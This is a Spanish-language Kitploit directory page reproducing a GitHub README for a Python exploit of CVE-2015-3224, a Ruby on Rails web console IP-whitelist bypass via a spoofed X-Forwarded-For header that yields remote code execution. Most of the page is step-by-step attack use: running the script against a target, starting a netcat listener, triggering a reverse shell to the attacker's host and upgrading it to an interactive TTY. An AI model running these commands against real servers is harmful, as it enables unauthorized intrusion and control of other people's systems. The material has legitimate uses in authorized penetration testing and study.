Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2015-3224 — Ruby on Rails Exploit de Consola Web (CVE-2015-3224) | Kitploit
Herramientas/GitHubGitHub/sic4rio/cve-2015-3224
Análisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebPruebas de PenetraciónAprendizaje y EducaciónHerramienta de Acceso Remoto
GitHubsic4rio/cve-2015-3224

CVE-2015-3224

Ruby on Rails Exploit de Consola Web (CVE-2015-3224)

Ver Repositorio
hace 1 añoAún no revisado

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

Exploit de la Consola Web de Ruby on Rails (CVE-2015-3224)

CVE-2015-3224

Este repositorio contiene un script en Python para explotar una vulnerabilidad de omisión de la lista blanca de IP en la consola web de desarrollo de Ruby on Rails 4.0.x y 4.1.x. El script permite la ejecución remota de código en servidores vulnerables.

⚠️ Aviso de responsabilidad Este script está destinado únicamente a fines educativos y pruebas de seguridad autorizadas. No lo utilice en ningún sistema sin permiso explícito. Los autores no se hacen responsables de ningún uso indebido o daño causado por este script.


📌 Descripción de la Vulnerabilidad

La consola web en versiones vulnerables de Ruby on Rails está destinada a fines de desarrollo y solo debería ser accesible desde direcciones IP de confianza. Sin embargo, debido al manejo incorrecto del encabezado HTTP X-Forwarded-For, un atacante puede suplantar su dirección IP para parecer un usuario local de confianza (por ejemplo, 127.0.0.1 o ::1). Esto elude la lista blanca de IP y otorga acceso no autorizado a la consola web, lo que lleva a la ejecución remota de código.


🚀 Características

  • Fácil de usar: Interfaz de línea de comandos simple.
  • Descubrimiento dinámico de rutas: Sonda automáticamente el objetivo para encontrar la ruta dinámica de la sesión de la consola.
  • Dos modos de shell:
    • Shell simple: Un shell básico no interactivo para comandos rápidos.
    • Shell TTY inverso: Un comando de una línea para obtener un shell reverso PTY completamente interactivo.
  • Legibilidad mejorada: Salida con código de colores para mensajes de estado, éxitos y errores.
  • Robusto: Incluye manejo de errores para problemas de red y comandos fallidos.

✅ Requisitos

  • Python 3
  • Librería requests

Instalar requests:

root@kitploit:~
pip install requests

⚙️ Uso

  1. Clonar el repositorio:
    root@kitploit:~
    git clone https://github.com/Sic4rio/CVE-2015-3224
    cd <repo-directory>
    
  2. Hacer el script ejecutable:
    root@kitploit:~
    chmod +x exploit.py
    

Opción 1: Shell interactivo simple

Este modo es útil para ejecutar comandos rápidos y simples.

root@kitploit:~
./exploit.py -t http://<TARGET_IP>:<PORT>

Opción 2: TTY interactivo completo (Shell inverso)

Este es el modo recomendado para un shell estable y completamente interactivo.

Paso 1: Iniciar un listener

En su máquina local, abra una nueva terminal e inicie un listener netcat.

root@kitploit:~
nc -lvnp 9001

Paso 2: Ejecutar el exploit

En otra terminal, ejecute el script con la bandera --rev-shell, proporcionando su IP local (lhost) y puerto (lport).

root@kitploit:~
./exploit.py -t http://<TARGET_IP>:<PORT> --rev-shell --lhost <YOUR_IP> --lport 9001

Paso 3: Estabilizar el shell

Una conexión llegará a su listener netcat. Para actualizarlo a un TTY completamente interactivo, siga estos pasos en la ventana de netcat:

  1. Ponga el shell en segundo plano presionando Ctrl+Z.
  2. Configure su terminal local en modo raw y traiga el shell al primer plano.
    root@kitploit:~
    stty raw -echo; fg
    
    Presione Enter si el prompt no reaparece.
  3. Configure las propiedades del terminal en el shell remoto.
    root@kitploit:~
    reset
    export SHELL=bash
    export TERM=xterm-256color
    stty rows 50 cols 120
    

¡Ahora tiene un shell completamente funcional y estable!


👥 Créditos

  • Exploit original: Eval (@0xEval)
  • El archivo Readme.md: GPT
Descargar herramienta